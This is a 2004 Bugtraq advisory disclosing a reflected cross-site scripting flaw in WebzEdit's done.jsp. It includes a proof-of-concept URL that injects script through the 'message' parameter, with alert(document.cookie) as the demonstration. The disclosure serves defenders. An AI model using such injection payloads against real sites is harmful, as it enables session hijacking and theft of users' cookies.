Cross Site Scripting in WebzEdit

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Cross Site Scripting in WebzEdit
From: Cheng Peng Su <apple_soup@xxxxxxx>
Date: 21 Feb 2004 15:13:30 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


Title:Cross Site Scripting in WebzEdit
Release Date: Feb 22,2004 
Application: WebzEdit 
Version Affected: 1.9 or lower 
Platform: JSP 
Severity: Low 
Discover: Cheng Peng Su(apple_soup[at]msn.com) 
Vendor URL: http://www.freewebs.com/ 
################################################ 
Intro:
     WebzEdit is a tool to edit web page online.

Proof Of Concept: 
     This page 
(http://host/WebzEdit/done.jsp?message=index.htm%20has%20been%20saved.) will 
show you a Message box with "index.htm has been saved." , and the [done.jsp] 
doesn't filter out illegal characters.
     So here is a XSS vuln:
     URL:http://host/WebzEdit/done.jsp?message=');[XSS code];a=escape('

Exploit: 
URL:http://host/WebzEdit/done.jsp?message=');alert(document.cookie);a=escape('



----------------------------------------------------------
Cheng Peng Su
Class 1,Senior 2,High school attached to Wuhan University,
Wuhan,Hubei,China
email:apple_soup[at]msn.com

Prev by Date: Re: Bank of America Contact
Next by Date: Re: Bank of America Contact
Previous by thread: 3Com DSL Router Long Request DoS exploit.
Next by thread: TSLSA-2004-0008 - kernel
Index(es):
- Date
- Thread